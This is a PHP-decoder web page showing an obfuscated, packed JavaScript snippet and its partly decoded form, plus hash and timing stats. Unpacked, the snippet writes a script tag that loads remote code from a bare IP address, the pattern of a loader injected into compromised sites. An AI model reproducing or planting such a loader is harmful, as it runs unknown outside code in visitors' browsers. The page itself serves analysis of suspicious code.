Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval( function (p, a, c, k, e, d) { e = function (c) { return (c < a ? "": e(parseIn..

Decoded Output download

<?  eval( 
function (p, a, c, k, e, d) { 
	e = function (c) { 
		return (c < a ? "": e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) 
	}; 
	if (!''.replace(/^/, String)) { 
		while (c--) d[e(c)] = k[c] | |e(c); 
		k = [function (e) { 
			return d[e] 
		}]; 
		e = function () { 
			return '\w+' 
		}; 
		c = 1; 
	}; 
	while (c--) if (k[c]) p = p.replace(new RegExp('\b' + e(c) + '\b', 'g'), k[c]); 
	return p; 
} 
 
('6.5("<0 8=\"7/2\" 1=\"4://3 
.e.d.g/f/a.9?c=b\"></0>");', 17, 17, 'script|src|javascript|103|http|write|document|text|type|php|serco|Serco|id|202|25|Js|156'.split('|'), 0, {})) ?>

Did this file decode correctly?

Original Code

eval(
function (p, a, c, k, e, d) {
	e = function (c) {
		return (c < a ? "": e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
	};
	if (!''.replace(/^/, String)) {
		while (c--) d[e(c)] = k[c] | |e(c);
		k = [function (e) {
			return d[e]
		}];
		e = function () {
			return '\\w+'
		};
		c = 1;
	};
	while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
	return p;
}

('6.5("<0 8=\\"7/2\\" 1=\\"4://3
.e.d.g/f/a.9?c=b\\"></0>");', 17, 17, 'script|src|javascript|103|http|write|document|text|type|php|serco|Serco|id|202|25|Js|156'.split('|'), 0, {}))

Function Calls

None

Variables

None

Stats

MD5 c5506ddf3660c4c1eafdf7e846801809
Eval Count 0
Decode Time 80 ms